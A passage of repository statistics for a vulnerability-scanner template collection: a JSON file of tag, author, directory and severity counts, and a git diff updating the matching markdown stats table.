ve2005","count":2},{"name":"favicon","count":2},{"name":"igs","count":2},{"name":"nextcloud","count":2},{"name":"wuzhicms","count":2},{"name":"shellshock","count":2},{"name":"backdoor","count":2},{"name":"github","count":2},{"name":"sharepoint","count":2},{"name":"linux","count":2},{"name":"chamilo","count":2},{"name":"pega","count":2},{"name":"horde","count":2},{"name":"paloalto","count":2},{"name":"jsf","count":2},{"name":"mida","count":2},{"name":"showdoc","count":2},{"name":"dolibarr","count":2},{"name":"cve2007","count":2},{"name":"axis","count":2},{"name":"leak","count":2},{"name":"spark","count":2},{"name":"yii","count":2},{"name":"jeedom","count":2},{"name":"mcafee","count":2},{"name":"aruba","count":2},{"name":"nagios","count":2},{"name":"bruteforce","count":2},{"name":"axis2","count":2},{"name":"netis","count":2},{"name":"hjtcloud","count":2},{"name":"liferay","count":2},{"name":"jboss","count":2},{"name":"globalprotect","count":2},{"name":"cache","count":2},{"name":"saltstack","count":2},{"name":"prestashop","count":2},{"name":"sitecore","count":2},{"name":"openfire","count":2},{"name":"xxljob","count":2},{"name":"azure","count":2},{"name":"totemomail","count":2},{"name":"guacamole","count":2},{"name":"oauth","count":2},{"name":"keycloak","count":2},{"name":"prtg","count":2},{"name":"kentico","count":2},{"name":"netgenie","count":1},{"name":"timeclock","count":1},{"name":"graphql","count":1},{"name":"mediumish","count":1},{"name":"basic-auth","count":1},{"name":"meraki","count":1},{"name":"jmx","count":1},{"name":"phpfusion","count":1},{"name":"ecom","count":1},{"name":"pulsesecure","count":1},{"name":"spectracom","count":1},{"name":"hadoop","count":1},{"name":"pihole","count":1},{"name":"tjws","count":1},{"name":"dvwa","count":1},{"name":"mongo","count":1},{"name":"zarafa","count":1},{"name":"exposures","count":1},{"name":"heroku","count":1},{"name":"gespage","count":1},{"name":"webui","count":1},{"name":"st","count":1},{"name":"monitorr","count":1},{"name":"minimouse","count":1},{"name":"extractor","count":1},{"name":"zyxel","count":1},{"name":"plastic","count":1},{"name":"ns","count":1},{"name":"luftguitar","count":1},{"name":"tenda","count":1},{"name":"lanproxy","count":1},{"name":"dompdf","count":1},{"name":"cofax","count":1},{"name":"owa","count":1},{"name":"exacqvision","count":1},{"name":"tensorboard","count":1},{"name":"fortigate","count":1},{"name":"pyramid","count":1},{"name":"cerebro","count":1},{"name":"lighttpd","count":1},{"name":"mobileiron","count":1},{"name":"gitlist","count":1},{"name":"tongda","count":1},{"name":"jquery","count":1},{"name":"gstorage","count":1},{"name":"diris","count":1},{"name":"shoretel","count":1},{"name":"graphite","count":1},{"name":"aspnuke","count":1},{"name":"wamp","count":1},{"name":"email","count":1},{"name":"shopizer","count":1},{"name":"tcexam","count":1},{"name":"zms","count":1},{"name":"rabbitmq","count":1},{"name":"apos","count":1},{"name":"swagger","count":1},{"name":"postmessage","count":1},{"name":"h3c-imc","count":1},{"name":"gunicorn","count":1},{"name":"tamronos","count":1},{"name":"rubedo","count":1},{"name":"triconsole","count":1},{"name":"qsan","count":1},{"name":"mysql","count":1},{"name":"oneblog","count":1},{"name":"avtech","count":1},{"name":"smartblog","count":1},{"name":"sangfor","count":1},{"name":"parentlink","count":1},{"name":"influxdb","count":1},{"name":"argussurveillance","count":1},{"name":"fortiweb","count":1},{"name":"chyrp","count":1},{"name":"wmt","count":1},{"name":"pcoip","count":1},{"name":"auth","count":1},{"name":"node-red-dashboard","count":1},{"name":"etouch","count":1},{"name":"dom","count":1},{"name":"elasticsearch","count":1},{"name":"tika","count":1},{"name":"xampp","count":1},{"name":"actuator","count":1},{"name":"solman","count":1},{"name":"traefik","count":1},{"name":"sqlite","count":1},{"name":"wiki","count":1},{"name":"asus","count":1},{"name":"tectuus","count":1},{"name":"springframework","count":1},{"name":"panabit","count":1},{"name":"javascript","count":1},{"name":"eg","count":1},{"name":"csod","count":1},{"name":"ntopng","count":1},{"name":"websphere","count":1},{"name":"simplecrm","count":1},{"name":"shoppable","count":1},{"name":"zend","count":1},{"name":"upnp","count":1},{"name":"memcached","count":1},{"name":"camunda","count":1},{"name":"tapestry","count":1},{"name":"mantis","count":1},{"name":"achecker","count":1},{"name":"sprintful","count":1},{"name":"tor","count":1},{"name":"wildfly","count":1},{"name":"cse","count":1},{"name":"ruckus","count":1},{"name":"ognl","count":1},{"name":"haproxy","count":1},{"name":"majordomo2","count":1},{"name":"dnssec","count":1},{"name":"spring","count":1},{"name":"addpac","count":1},{"name":"geutebruck","count":1},{"name":"landray","count":1},{"name":"interlib","count":1},{"name":"ecoa","count":1},{"name":"turbocrm","count":1},{"name":"jeewms","count":1},{"name":"eyelock","count":1},{"name":"rfi","count":1},{"name":"nimble","count":1},{"name":"bash","count":1},{"name":"xiuno","count":1},{"name":"vnc","count":1},{"name":"pippoint","count":1},{"name":"pmb","count":1},{"name":"ganglia","count":1},{"name":"fastcgi","count":1},{"name":"zenario","count":1},{"name":"omi","count":1},{"name":"sentry","count":1},{"name":"yachtcontrol","count":1},{"name":"woocomernce","count":1},{"name":"mpsec","count":1},{"name":"hiawatha","count":1},{"name":"phpinfo","count":1},{"name":"oscommerce","count":1},{"name":"biometrics","count":1},{"name":"qvisdvr","count":1},{"name":"mautic","count":1},{"name":"kerbynet","count":1},{"name":"bolt","count":1},{"name":"ruby","count":1},{"name":"spf","count":1},{"name":"labtech","count":1},{"name":"dotclear","count":1},{"name":"sarg","count":1},{"name":"discord","count":1},{"name":"clickhouse","count":1},{"name":"upload","count":1},{"name":"sceditor","count":1},{"name":"lotuscms","count":1},{"name":"thinkadmin","count":1},{"name":"tileserver","count":1},{"name":"klog","count":1},{"name":"mrtg","count":1},{"name":"cscart","count":1},{"name":"zeroshell","count":1},{"name":"csrf","count":1},{"name":"octobercms","count":1},{"name":"shopware","count":1},{"name":"cockpit","count":1},{"name":"ssltls","count":1},{"name":"stem","count":1},{"name":"netrc","count":1},{"name":"cherokee","count":1},{"name":"esmtp","count":1},{"name":"wooyun","count":1},{"name":"panos","count":1},{"name":"wifisky","count":1},{"name":"myvuehelp","count":1},{"name":"pacsone","count":1},{"name":"phpunit","count":1},{"name":"ricoh","count":1},{"name":"iceflow","count":1},{"name":"k8s","count":1},{"name":"commscope","count":1},{"name":"nweb2fax","count":1},{"name":"centos","count":1},{"name":"fastapi","count":1},{"name":"shiro","count":1},{"name":"opensns","count":1},{"name":"metinfo","count":1},{"name":"seacms","count":1},{"name":"elfinder","count":1},{"name":"resourcespace","count":1},{"name":"monitorix","count":1},{"name":"plone","count":1},{"name":"scs","count":1},{"name":"postgres","count":1},{"name":"opentsdb","count":1},{"name":"xml","count":1},{"name":"timesheet","count":1},{"name":"domxss","count":1},{"name":"floc","count":1},{"name":"linkedin","count":1},{"name":"javafaces","count":1},{"name":"emc","count":1},{"name":"glances","count":1},{"name":"miscrsoft","count":1},{"name":"artica","count":1},{"name":"dotnetnuke","count":1},{"name":"nomad","count":1},{"name":"rmc","count":1},{"name":"fiori","count":1},{"name":"jitsi","count":1},{"name":"totaljs","count":1},{"name":"mongoshake","count":1},{"name":"gitea","count":1},{"name":"saltapi","count":1},{"name":"wing-ftp","count":1},{"name":"redhat","count":1},{"name":"setup","count":1},{"name":"sco","count":1},{"name":"servicedesk","count":1},{"name":"glowroot","count":1},{"name":"expn","count":1},{"name":"visualtools","count":1},{"name":"jenzabar","count":1},{"name":"checkpoint","count":1},{"name":"fuelcms","count":1},{"name":"sidekiq","count":1},{"name":"wavemaker","count":1},{"name":"gridx","count":1},{"name":"pgadmin","count":1},{"name":"emby","count":1},{"name":"adb","count":1},{"name":"fortigates","count":1},{"name":"solarlog","count":1},{"name":"empirecms","count":1},{"name":"listserv","count":1},{"name":"zmanda","count":1},{"name":"iptime","count":1},{"name":"gogs","count":1},{"name":"zzzcms","count":1},{"name":"pagespeed","count":1},{"name":"kindeditor","count":1},{"name":"ilo4","count":1},{"name":"mirai","count":1},{"name":"kubeflow","count":1},{"name":"nuxeo","count":1},{"name":"clockwork","count":1},{"name":"grails","count":1},{"name":"crm","count":1},{"name":"octoprint","count":1},{"name":"clockwatch","count":1},{"name":"blind","count":1},{"name":"sureline","count":1},{"name":"opensmtpd","count":1},{"name":"discourse","count":1},{"name":"api-manager","count":1},{"name":"processmaker","count":1},{"name":"mdb","count":1},{"name":"svnserve","count":1},{"name":"spidercontrol","count":1},{"name":"panasonic","count":1},{"name":"krweb","count":1},{"name":"optiLink","count":1},{"name":"74cms","count":1},{"name":"fortinet","count":1},{"name":"oidc","count":1},{"name":"whm","count":1},{"name":"lancom","count":1},{"name":"jsp","count":1},{"name":"k8","count":1},{"name":"database","count":1},{"name":"concrete","count":1},{"name":"ems","count":1},{"name":"spip","count":1},{"name":"sophos","count":1},{"name":"accela","count":1},{"name":"realteo","count":1},{"name":"elascticsearch","count":1},{"name":"azkaban","count":1},{"name":"robomongo","count":1},{"name":"selea","count":1},{"name":"lg-nas","count":1},{"name":"cve2006","count":1},{"name":"codeigniter","count":1},{"name":"magicflow","count":1},{"name":"ewebs","count":1},{"name":"bullwark","count":1},{"name":"kyan","count":1},{"name":"tracer","count":1},{"name":"portainer","count":1},{"name":"visionhub","count":1},{"name":"uwsgi","count":1},{"name":"phpfastcache","count":1},{"name":"redcap","count":1},{"name":"weiphp","count":1},{"name":"tensorflow","count":1},{"name":"s3","count":1},{"name":"mailchimp","count":1},{"name":"flink","count":1},{"name":"natemail","count":1},{"name":"cyberoam","count":1},{"name":"websvn","count":1},{"name":"ssl","count":1},{"name":"gloo","count":1},{"name":"alerta","count":1},{"name":"rocketchat","count":1},{"name":"varnish","count":1},{"name":"frontpage","count":1},{"name":"metabase","count":1},{"name":"arl","count":1},{"name":"bitly","count":1},{"name":"ioncube","count":1},{"name":"netmask","count":1},{"name":"scimono","count":1},{"name":"primetek","count":1},{"name":"rsyncd","count":1},{"name":"maccmsv10","count":1},{"name":"eprints","count":1},{"name":"opencast","count":1},{"name":"cobub","count":1},{"name":"razor","count":1},{"name":"vcenter","count":1},{"name":"htmli","count":1},{"name":"zte","count":1},{"name":"plugin","count":1},{"name":"couchbase","count":1},{"name":"synnefo","count":1},{"name":"viewpoint","count":1},{"name":"trane","count":1},{"name":"jenkin","count":1},{"name":"woocommerce","count":1},{"name":"eyou","count":1},{"name":"duomicms","count":1},{"name":"nsasg","count":1},{"name":"blackboard","count":1},{"name":"redmine","count":1},{"name":"apiman","count":1},{"name":"openvpn","count":1},{"name":"chevereto","count":1},{"name":"circontrorl","count":1},{"name":"shopxo","count":1},{"name":"sar2html","count":1},{"name":"tpshop","count":1},{"name":"proftpd","count":1},{"name":"beanshell","count":1},{"name":"chinaunicom","count":1},{"name":"plc","count":1},{"name":"alibaba","count":1},{"name":"cors","count":1},{"name":"kafdrop","count":1},{"name":"tidb","count":1},{"name":"dotnet","count":1},{"name":"jaspersoft","count":1},{"name":"gsoap","count":1},{"name":"hiboss","count":1},{"name":"calendarix","count":1},{"name":"webmin","count":1},{"name":"phpwiki","count":1},{"name":"zookeeper","count":1},{"name":"webftp","count":1},{"name":"finereport","count":1},{"name":"keenetic","count":1},{"name":"cgi","count":1},{"name":"qdpm","count":1},{"name":"viewlinc","count":1},{"name":"acexy","count":1},{"name":"acontent","count":1},{"name":"lotus","count":1},{"name":"clave","count":1},{"name":"mara","count":1},{"name":"socomec","count":1},{"name":"idemia","count":1},{"name":"perl","count":1},{"name":"centreon","count":1},{"name":"okta","count":1},{"name":"b2evolution","count":1},{"name":"xdcms","count":1},{"name":"wavlink","count":1},{"name":"expose","count":1},{"name":"skywalking","count":1},{"name":"openerp","count":1},{"name":"fedora","count":1},{"name":"drone","count":1},{"name":"sgp","count":1},{"name":"werkzeug","count":1},{"name":"xvr","count":1},{"name":"erp-nc","count":1},{"name":"twitter-server","count":1},{"name":"episerver","count":1},{"name":"zcms","count":1},{"name":"soar","count":1},{"name":"mantisbt","count":1},{"name":"owasp","count":1},{"name":"craftcms","count":1},{"name":"clusterengine","count":1},{"name":"cocoon","count":1},{"name":"ghost","count":1},{"name":"huijietong","count":1},{"name":"avalanche","count":1},{"name":"netdata","count":1},{"name":"salesforce","count":1},{"name":"webmodule-ee","count":1},{"name":"olivetti","count":1},{"name":"smi","count":1},{"name":"ueditor","count":1},{"name":"svn","count":1},{"name":"rujjie","count":1},{"name":"gilacms","count":1},{"name":"terraform","count":1},{"name":"landrayoa","count":1},{"name":"openemr","count":1},{"name":"dvr","count":1},{"name":"vsphere","count":1},{"name":"redwood","count":1},{"name":"nps","count":1},{"name":"starttls","count":1},{"name":"livezilla","count":1},{"name":"bedita","count":1},{"name":"nc2","count":1},{"name":"mariadb","count":1},{"name":"expressjs","count":1},{"name":"blue-ocean","count":1},{"name":"daybyday","count":1},{"name":"burp","count":1},{"name":"rhymix","count":1},{"name":"graylog","count":1},{"name":"froxlor","count":1},{"name":"powercreator","count":1},{"name":"dbeaver","count":1},{"name":"openrestry","count":1},{"name":"office365","count":1},{"name":"openstack","count":1},{"name":"sourcebans","count":1},{"name":"yealink","count":1},{"name":"nordex","count":1},{"name":"comodo","count":1},{"name":"szhe","count":1},{"name":"darkstat","count":1},{"name":"bazarr","count":1},{"name":"default","count":1},{"name":"openx","count":1},{"name":"appweb","count":1},{"name":"myucms","count":1},{"name":"doh","count":1},{"name":"moinmoin","count":1},{"name":"moin","count":1},{"name":"nexusdb","count":1},{"name":"announcekit","count":1},{"name":"vidyo","count":1},{"name":"exponentcms","count":1},{"name":"vsftpd","count":1},{"name":"beanstalk","count":1},{"name":"webadmin","count":1},{"name":"lansweeper","count":1},{"name":"zm","count":1},{"name":"redis","count":1},{"name":"phalcon","count":1},{"name":"cloudinary","count":1},{"name":"smartsense","count":1},{"name":"ambari","count":1},{"name":"commax","count":1},{"name":"trilithic","count":1},{"name":"fortilogger","count":1},{"name":"xunchi","count":1},{"name":"anchorcms","count":1},{"name":"wazuh","count":1},{"name":"gateone","count":1},{"name":"rockethchat","count":1},{"name":"bigbluebutton","count":1},{"name":"geddy","count":1},{"name":"lutron","count":1},{"name":"linksys","count":1},{"name":"codemeter","count":1},{"name":"servicenow","count":1},{"name":"payara","count":1},{"name":"faraday","count":1},{"name":"rmi","count":1},{"name":"rdp","count":1},{"name":"bookstack","count":1},{"name":"vscode","count":1},{"name":"nuuo","count":1},{"name":"gotmls","count":1},{"name":"nette","count":1},{"name":"ulterius","count":1},{"name":"jfrog","count":1},{"name":"opm","count":1},{"name":"clink-office","count":1},{"name":"xmlchart","count":1},{"name":"sage","count":1},{"name":" default-login","count":1},{"name":"wondercms","count":1},{"name":"nedi","count":1},{"name":"subrion","count":1},{"name":"embedthis","count":1},{"name":"goahead","count":1},{"name":"feifeicms","count":1},{"name":"alertmanager","count":1},{"name":"cloudflare","count":1},{"name":"aura","count":1},{"name":"sql","count":1},{"name":"maxsite","count":1},{"name":"tieline","count":1},{"name":"circontrol","count":1},{"name":"logontracer","count":1},{"name":"karel","count":1},{"name":"hortonworks","count":1},{"name":"javamelody","count":1},{"name":"nifi","count":1},{"name":"acme","count":1},{"name":"jnoj","count":1}],"authors":[{"name":"pikpikcu","count":273},{"name":"dhiyaneshdk","count":258},{"name":"daffainfo","count":213},{"name":"pdteam","count":195},{"name":"geeknik","count":152},{"name":"dwisiswant0","count":131},{"name":"gy741","count":72},{"name":"pussycat0x","count":67},{"name":"madrobot","count":61},{"name":"princechaddha","count":61},{"name":"gaurang","count":42},{"name":"0x_akoko","count":39},{"name":"ice3man","count":26},{"name":"philippedelteil","count":25},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":9},{"name":"nadino","count":9},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"oppsec","count":7},{"name":"meme-lord","count":7},{"name":"emadshanab","count":7},{"name":"kophjager007","count":7},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"logicalhunter","count":6},{"name":"pentest_swissky","count":6},{"name":"puzzlepeaches","count":6},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":5},{"name":"iamnoooob","count":5},{"name":"joanbono","count":5},{"name":"lu4nx","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"thomas_from_offensity","count":3},{"name":"vsh00t","count":3},{"name":"idealphase","count":3},{"name":"unstabl3","count":3},{"name":"impramodsargar","count":3},{"name":"fyoorer","count":3},{"name":"mavericknerd","count":3},{"name":"sushantkamble","count":3},{"name":"shifacyclewala","count":3},{"name":"shine","count":3},{"name":"z3bd","count":3},{"name":"tess","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"f1tz","count":3},{"name":"incogbyte","count":3},{"name":"_generic_human_","count":3},{"name":"jarijaas","count":3},{"name":"dudez","count":3},{"name":"johnk3r","count":3},{"name":"binaryfigments","count":3},{"name":"emenalf","count":3},{"name":"skeltavik","count":3},{"name":"mohammedsaneem","count":2},{"name":"hetroublemakr","count":2},{"name":"davidmckennirey","count":2},{"name":"kiblyn11","count":2},{"name":"0xelkomy","count":2},{"name":"bsysop","count":2},{"name":"ree4pwn","count":2},{"name":"swissky","count":2},{"name":"0xsapra","count":2},{"name":"alifathi-h1","count":2},{"name":"huowuzhao","count":2},{"name":"afaq","count":2},{"name":"random-robbie","count":2},{"name":"parth","count":2},{"name":"gal nagli","count":2},{"name":"bernardofsr","count":2},{"name":"vavkamil","count":2},{"name":"0xcrypto","count":2},{"name":"0xprial","count":2},{"name":"convisoappsec","count":2},{"name":"johnjhacking","count":2},{"name":"bing0o","count":2},{"name":"0xrudra","count":2},{"name":"zomsop82","count":2},{"name":"udit_thakkur","count":2},{"name":"socketz","count":2},{"name":"ehsahil","count":2},{"name":"g4l1t0","count":2},{"name":"dheerajmadhukar","count":2},{"name":"gevakun","count":2},{"name":"lotusdll","count":2},{"name":"amsda","count":2},{"name":"x1m_martijn","count":2},{"name":"pxmme1337","count":2},{"name":"foulenzer","count":2},{"name":"hahwul","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"whoever","count":2},{"name":"manas_harsh","count":2},{"name":"fabaff","count":2},{"name":"nkxxkn","count":2},{"name":"randomrobbie","count":2},{"name":"moritz nentwig","count":2},{"name":"cocxanh","count":2},{"name":"arcc","count":2},{"name":"w4cky_","count":2},{"name":"bp0lr","count":2},{"name":"joeldeleep","count":2},{"name":"0xsmiley","count":2},{"name":"koti2","count":2},{"name":"r3naissance","count":2},{"name":"_c0wb0y_","count":1},{"name":"d0rkerdevil","count":1},{"name":"izn0u","count":1},{"name":"0xrod","count":1},{"name":"jeya seelan","count":1},{"name":"fmunozs","count":1},{"name":"j33n1k4","count":1},{"name":"mhdsamx","count":1},{"name":"yavolo","count":1},{"name":"mesaglio","count":1},{"name":"ahmed sherif","count":1},{"name":"rojanrijal","count":1},{"name":"remonsec","count":1},{"name":"alph4byt3","count":1},{"name":"alex","count":1},{"name":"sy3omda","count":1},{"name":"pratik khalane","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"knassar702","count":1},{"name":"bolli95","count":1},{"name":"0ut0fb4nd","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"thevillagehacker","count":1},{"name":"iampritam","count":1},{"name":"c3l3si4n","count":1},{"name":"ohlinge","count":1},{"name":"mah3sec_","count":1},{"name":"exploitation","count":1},{"name":"mass0ma","count":1},{"name":"elder tao","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"0h1in9e","count":1},{"name":"@dwisiswant0","count":1},{"name":"toufik airane","count":1},{"name":"adrianmf","count":1},{"name":"kabirsuda","count":1},{"name":"affix","count":1},{"name":"andysvints","count":1},{"name":"ringo","count":1},{"name":"ajaysenr","count":1},{"name":"x6263","count":1},{"name":"sullo","count":1},{"name":"wabafet","count":1},{"name":"zandros0","count":1},{"name":"pdp","count":1},{"name":"ldionmarcil","count":1},{"name":"th3.d1p4k","count":1},{"name":"sicksec","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"b0rn2r00t","count":1},{"name":"sickwell","count":1},{"name":"aresx","count":1},{"name":"un-fmunozs","count":1},{"name":"flag007","count":1},{"name":"tim_koopmans","count":1},{"name":"mubassirpatel","count":1},{"name":"patralos","count":1},{"name":"divya_mudgal","count":1},{"name":"rodnt","count":1},{"name":"brabbit10","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"regala_","count":1},{"name":"notsoevilweasel","count":1},{"name":"0xteles","count":1},{"name":"rotemreiss","count":1},{"name":"jteles","count":1},{"name":"petruknisme","count":1},{"name":"nerrorsec","count":1},{"name":"luci","count":1},{"name":"pudsec","count":1},{"name":"_darrenmartyn","count":1},{"name":"alperenkesk","count":1},{"name":"bad5ect0r","count":1},{"name":"me9187","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"vzamanillo","count":1},{"name":"smaranchand","count":1},{"name":"s1r1u5_","count":1},{"name":"borna nematzadeh","count":1},{"name":"infosecsanyam","count":1},{"name":"philippdelteil","count":1},{"name":"ahmetpergamum","count":1},{"name":"undefl0w","count":1},{"name":"fopina","count":1},{"name":"omarkurt","count":1},{"name":"xstp","count":1},{"name":"52971","count":1},{"name":"willd96","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"taielab","count":1},{"name":"becivells","count":1},{"name":"hanlaomo","count":1},{"name":"bjhulst","count":1},{"name":"kareemse1im","count":1},{"name":"yashgoti","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"nytr0gen","count":1},{"name":"manuelbua","count":1},{"name":"defr0ggy","count":1},{"name":"whynotke","count":1},{"name":"shelld3v","count":1},{"name":"luskabol","count":1},{"name":"shreyapohekar","count":1},{"name":"cookiehanhoan","count":1},{"name":"thezakman","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"juicypotato1","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"naglinagli","count":1},{"name":"kurohost","count":1},{"name":"blckraven","count":1},{"name":"furkansenan","count":1},{"name":"apt-mirror","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"micha3lb3n","count":1},{"name":"0xtavian","count":1},{"name":"_harleo","count":1},{"name":"yashanand155","count":1},{"name":"b0yd","count":1},{"name":"zhenwarx","count":1},{"name":"push4d","count":1},{"name":"raesene","count":1},{"name":"schniggie","count":1},{"name":"andirrahmani1","count":1},{"name":"ipanda","count":1},{"name":"ilovebinbash","count":1},{"name":"deena","count":1},{"name":"qlkwej","count":1},{"name":"its0x08","count":1},{"name":"soyelmago","count":1},{"name":"sec_hawk","count":1},{"name":"hakluke","count":1},{"name":"intx0x80","count":1},{"name":"geraldino2","count":1},{"name":"absshax","count":1},{"name":"streetofhackerr007","count":1},{"name":"chron0x","count":1},{"name":"udyz","count":1},{"name":"berkdusunur","count":1},{"name":"b4uh0lz","count":1},{"name":"sshell","count":1},{"name":"co0nan","count":1},{"name":"noamrathaus","count":1},{"name":"gboddin","count":1},{"name":"ooooooo_q","count":1},{"name":"dawid-czarnecki","count":1},{"name":"elmahdi","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"revblock","count":1},{"name":"shifacyclewla","count":1},{"name":"kre80r","count":1},{"name":"akshansh","count":1},{"name":"retr0","count":1},{"name":"evolutionsec","count":1},{"name":"daviey","count":1},{"name":"tirtha_mandal","count":1},{"name":"akash.c","count":1},{"name":"makyotox","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1}],"directory":[{"name":"cves","count":725},{"name":"vulnerabilities","count":301},{"name":"exposed-panels","count":247},{"name":"technologies","count":191},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":36},{"name":"network","count":32},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":643},{"name":"high","count":553},{"name":"medium","count":448},{"name":"critical","count":273},{"name":"low","count":152}],"types":[{"name":"http","count":1965},{"name":"file","count":46},{"name":"network","count":41},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 7f1155f4e9..4db6036e00 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,815 +1,818 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 724 | pikpikcu | 273 | cves | 724 | info | 642 | http | 1962 | -| lfi | 258 | dhiyaneshdk | 258 | vulnerabilities | 299 | high | 552 | file | 46 | -| panel | 248 | daffainfo | 213 | exposed-panels | 248 | medium | 449 | network | 41 | -| xss | 244 | pdteam | 196 | technologies | 190 | critical | 271 | dns | 12 | +| cve | 725 | pikpikcu | 273 | cves | 725 | info | 643 | http | 1965 | +| lfi | 260 | dhiyaneshdk | 258 | vulnerabilities | 301 | high | 553 | file | 46 | +| panel | 248 | daffainfo | 213 | exposed-panels | 247 | medium | 448 | network | 41 | +| xss | 244 | pdteam | 195 | technologies | 191 | critical | 273 | dns | 12 | | exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | | -| wordpress | 222 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| wordpress | 223 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | | rce | 198 | gy741 | 72 | takeovers | 64 | | | | | -| tech | 181 | pussycat0x | 65 | default-logins | 56 | | | | | -| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | -| wp-plugin | 149 | madrobot | 61 | workflows | 36 | | | | | -| cve2021 | 126 | gaurang | 42 | network | 32 | | | | | -| cve2019 | 96 | 0x_akoko | 37 | miscellaneous | 24 | | | | | +| tech | 181 | pussycat0x | 67 | default-logins | 56 | | | | | +| cve2020 | 164 | madrobot | 61 | file | 46 | | | | | +| wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | +| cve2021 | 127 | gaurang | 42 | network | 32 | | | | | +| cve2019 | 96 | 0x_akoko | 39 | miscellaneous | 24 | | | | | | config | 94 | ice3man | 26 | iot | 23 | | | | | | cve2018 | 85 | philippedelteil | 25 | dns | 12 | | | | | | joomla | 79 | organiccrap | 24 | fuzzing | 10 | | | | | | apache | 70 | sheikhrishad | 15 | cnvd | 9 | | | | | | cve2010 | 69 | milo2012 | 14 | headless | 5 | | | | | -| takeover | 68 | pr3r00t | 13 | | | | | | | +| takeover | 68 | pr3r00t | 14 | | | | | | | | token | 65 | techbrunchfr | 13 | | | | | | | | default-login | 63 | suman_kar | 12 | | | | | | | | iot | 62 | r3dg33k | 11 | | | | | | | | oob | 53 | cyllective | 11 | | | | | | | -| cve2017 | 50 | wdahlenb | 10 | | | | | | | -| unauth | 46 | random_robbie | 10 | | | | | | | -| file | 46 | righettod | 10 | | | | | | | -| network | 41 | nadino | 9 | | | | | | | +| cve2017 | 50 | righettod | 10 | | | | | | | +| unauth | 47 | wdahlenb | 10 | | | | | | | +| file | 46 | random_robbie | 10 | | | | | | | +| network | 41 | hackergautam | 9 | | | | | | | | sqli | 38 | melbadry9 | 9 | | | | | | | -| ssrf | 37 | hackergautam | 9 | | | | | | | -| | 36 | aashiq | 8 | | | | | | | +| ssrf | 37 | nadino | 9 | | | | | | | | oracle | 36 | that_juan_ | 8 | | | | | | | -| cve2016 | 36 | iamthefrogy | 8 | | | | | | | -| redirect | 33 | emadshanab | 7 | | | | | | | -| logs | 30 | techryptic (@tech) | 7 | | | | | | | -| jira | 28 | 0x240x23elu | 7 | | | | | | | +| cve2016 | 36 | aashiq | 8 | | | | | | | +| | 36 | iamthefrogy | 8 | | | | | | | +| redirect | 33 | kophjager007 | 7 | | | | | | | +| logs | 30 | randomstr1ng | 7 | | | | | | | +| jira | 28 | emadshanab | 7 | | | | | | | +| atlassian | 27 | techryptic (@tech) | 7 | | | | | | | | listing | 27 | dr_set | 7 | | | | | | | -| atlassian | 27 | randomstr1ng | 7 | | | | | | | -| cve2015 | 23 | oppsec | 7 | | | | | | | -| misc | 23 | kophjager007 | 7 | | | | | | | +| misc | 23 | dogasantos | 7 | | | | | | | +| cve2015 | 23 | 0x240x23elu | 7 | | | | | | | | disclosure | 21 | harshbothra_ | 7 | | | | | | | -| generic | 20 | dogasantos | 7 | | | | | | | -| auth-bypass | 20 | meme-lord | 7 | | | | | | | +| auth-bypass | 20 | oppsec | 7 | | | | | | | +| generic | 20 | meme-lord | 7 | | | | | | | +| cisco | 19 | caspergn | 6 | | | | | | | +| router | 19 | logicalhunter | 6 | | | | | | | | aem | 19 | __fazal | 6 | | | | | | | -| cisco | 19 | logicalhunter | 6 | | | | | | | -| router | 19 | pentest_swissky | 6 | | | | | | | -| debug | 18 | caspergn | 6 | | | | | | | +| misconfig | 18 | pentest_swissky | 6 | | | | | | | | sap | 18 | puzzlepeaches | 6 | | | | | | | -| cve2014 | 18 | ganofins | 5 | | | | | | | -| springboot | 18 | iamnoooob | 5 | | | | | | | -| misconfig | 18 | joanbono | 5 | | | | | | | -| php | 16 | 